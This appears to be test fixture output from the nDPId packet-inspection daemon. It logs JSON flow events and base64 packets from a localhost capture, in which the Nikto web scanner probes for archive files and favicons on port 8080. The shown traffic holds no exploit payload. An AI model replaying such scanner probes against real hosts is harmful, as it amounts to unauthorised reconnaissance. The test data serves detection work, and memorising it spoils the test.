+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":1,"flow_last_seen":1576420277345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277345,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HTtAAEAGHvx\/AAABfwAAAcTeH5D3FiWCONN3YoAYAED+swAAAQEICp1m\/YmdZv2JR0VUIC8xMjcud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":1,"flow_last_seen":1576420277347,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277347,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/ZRVAAEAG1yF\/AAABfwAAAcTgH5Bb9F2rFITQsoAYAED+swAAAQEICp1m\/YudZv2LR0VUIC8xMjcud2FyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":1,"flow_last_seen":1576420277349,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277349,"pkt":"AAAAAAAAAAAAAAAACABFAADCefJAAEAGwkF\/AAABfwAAAcTiH5DNN0FKl3iI04AYAED+tgAAAQEICp1m\/Y2dZv2MR0VUIC8xMjcwMDEudGFyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":1,"flow_last_seen":1576420277350,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277350,"pkt":"AAAAAAAAAAAAAAAACABFAADCI4FAAEAGGLN\/AAABfwAAAcTkH5CTwxvH1PwL8oAYAED+tgAAAQEICp1m\/Y6dZv2OR0VUIC8xMjcwMDEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":1,"flow_last_seen":1576420277352,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277352,"pkt":"AAAAAAAAAAAAAAAACABFAADBrJpAAEAGj5p\/AAABfwAAAcTmH5B1JpQjd4rcfoAYAED+tQAAAQEICp1m\/ZCdZv2QR0VUIC9mYXZpY29uLmljbyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":1,"flow_last_seen":1576420277354,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277354,"pkt":"AAAAAAAAAAAAAAAACABFAADKIPlAAEAGGzN\/AAABfwAAAcToH5DzJBhOnEiKeoAYAED+vgAAAQEICp1m\/ZKdZv2SR0VUIC9mYXZpY29ucy9mYXZpY29uLmljbyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6ZmF2aWNvbikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":1,"flow_last_seen":1576420277355,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277355,"pkt":"AAAAAAAAAAAAAAAACABFAADBHndAAEAGHb5\/AAABfwAAAcTqH5Ag4SbPDIJk5IAYAED+tQAAAQEICp1m\/ZOdZv2TR0VUIC9mYXZpY29uLmdpZiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":1,"flow_last_seen":1576420277357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277357,"pkt":"AAAAAAAAAAAAAAAACABFAADKgAdAAEAGvCR\/AAABfwAAAcTsH5DBK7i\/eaGnm4AYAED+vgAAAQEICp1m\/ZWdZv2UR0VUIC9mYXZpY29ucy9mYXZpY29uLmdpZiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":1,"flow_last_seen":1576420277358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277358,"pkt":"AAAAAAAAAAAAAAAACABFAADByl9AAEAGcdV\/AAABfwAAAcTuH5C2YPLn77QmvYAYAED+tQAAAQEICp1m\/ZadZv2WR0VUIC9mYXZpY29uLnBuZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":1,"flow_last_seen":1576420277359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277359,"pkt":"AAAAAAAAAAAAAAAACABFAADK7Z9AAEAGTox\/AAABfwAAAcTwH5DcrNUiTS0awIAYAED+vgAAAQEICp1m\/ZedZv2XR0VUIC9mYXZpY29ucy9mYXZpY29uLnBuZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6ZmF2aWNvbikNCg0K"} 
+01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":1,"flow_last_seen":1576420277361,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420277361,"pkt":"AAAAAAAAAAAAAAAACABFAAC2klBAAEAGqe9\/AAABfwAAAcTyH5D2pKrzJKNAbIAYAED+qgAAAQEICp1m\/ZmdZv2ZR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 
